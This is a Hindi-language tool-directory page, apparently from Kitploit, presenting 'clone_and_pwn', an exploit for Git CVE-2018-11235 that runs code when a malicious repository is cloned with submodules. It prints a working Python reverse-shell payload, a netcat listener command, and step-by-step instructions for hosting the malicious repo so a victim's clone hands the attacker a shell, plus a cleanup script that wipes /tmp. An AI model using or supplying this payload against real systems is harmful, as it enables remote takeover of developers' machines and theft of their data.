Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
clone_and_pwn — CVE-2018-11235 का शोषण करता है | Kitploit
उपकरण/GitHubGitHub/h0k5/clone_and_pwn
पेलोड जनरेशनभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरिमोट एक्सेस टूल
GitHubh0k5/clone_and_pwn

clone_and_pwn

CVE-2018-11235 का शोषण करता है

रिपॉजिटरी देखें
18 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

शीर्षक

शोषण शीर्षक: Clone and Pwn
दिनांक: 4 जून, 2018
शोषण लेखक: Alejandro Caceres
विक्रेता होमपेज: https://git-scm.com/
सॉफ्टवेयर लिंक: https://git-scm.com/downloads
संस्करण: git क्लाइंट संस्करणों पर मनमाना कोड निष्पादित किया जाता है Git 2.13.7 से पहले, 2.14.x 2.14.4 से पहले, 2.15.x 2.15.2 से पहले, 2.16.x 2.16.4 से पहले, और 2.17.x 2.17.1 से पहले
परीक्षण किया गया: Linux: Ubuntu, Mint, MacOSX
CVE : CVE-2018-11235

CVE-2018-11235 के लिए शोषण उपयोग

CVE-2018-11235, जिसे यहाँ clone and pwn कहा गया है, एक दुर्भावनापूर्ण git रेपो बनाता है जो git में एक बग का शोषण करता है। जब --recurse-submodules फ्लैग का उपयोग करके रेपो क्लोन किया जाता है, तो git क्लाइंट संस्करणों पर मनमाना कोड निष्पादित किया जाता है: Git 2.13.7 से पहले, 2.14.x 2.14.4 से पहले, 2.15.x 2.15.2 से पहले, 2.16.x 2.16.4 से पहले, और 2.17.x 2.17.1 से पहले।

इस मॉड्यूल का उपयोग करने के लिए इसे सीधे इंटरनेट एक्सेस वाले सर्वर पर रखें (जैसे AWS, Digital Ocean) और evil.sh खोलें। यह कुछ इस तरह दिखेगा:

root@kitploit:~
#!/usr/bin/python

EXTERN_IP="127.0.0.1"
EXTERN_PORT=8080

#reverse shell to IP EXTERN_IP and port EXTERN_PORT
import socket, subprocess, os

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((EXTERN_IP, EXTERN_PORT))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

अपने रिवर्स शेल को प्राप्त करने के लिए EXTERN_IP और EXTERN_PORT को IP (बाहरी) और पोर्ट पर सेट करें। रिवर्स शेल को कुछ इस तरह प्राप्त किया जा सकता है:

nc -l <EXTERN_IP> EXTERN_PORT जैसे nc -l 193.23.23.32 8080

या Metasploit के सामान्य शेल मॉड्यूल के साथ। एक बार जब उपयोगकर्ता कमांड git clone --recurse-submodules git://<your ip>/repo dest_dir चलाता है, तो आपको एक रिवर्स शेल प्राप्त होगा।

यदि आपको कई बार चलाने में (या एक असफल प्रयास के बाद) समस्या हो रही है, तो निम्नलिखित की जाँच करें:

  • ./clean.sh चलाएं, ध्यान दें कि यह /tmp में सभी डेटा हटा देगा
  • ps aux | grep git के साथ प्रक्रियाओं की जाँच करें ताकि सुनिश्चित हो सके कि आप पहले से gitdaemon नहीं चला रहे हैं। किसी भी gitdaemon प्रक्रिया को समाप्त करें।

स्वीकृतियाँ

कोड @peff के git patch से लिया गया है (t/t7415-submodule-names.sh टेस्ट फाइल देखें)।

इस प्रकार, यह रिपॉजिटरी GNU जनरल पब्लिक लाइसेंस संस्करण 2 के तहत प्रकाशित की गई है।

पुराने git संस्करणों के लिए अतिरिक्त सुधार @atorralba की सौजन्य से (इस पोस्ट में विवरण)।

यह स्क्रिप्ट https://github.com/Rogdham/CVE-2018-11235 से अनुकूलित की गई है, ढेर सारा प्यार और श्रेय

=======

clone_and_pwn

CVE-2018-11235 का शोषण करता है

द्वारा @_hyp3ri0n और @mehaase

टूल डाउनलोड करें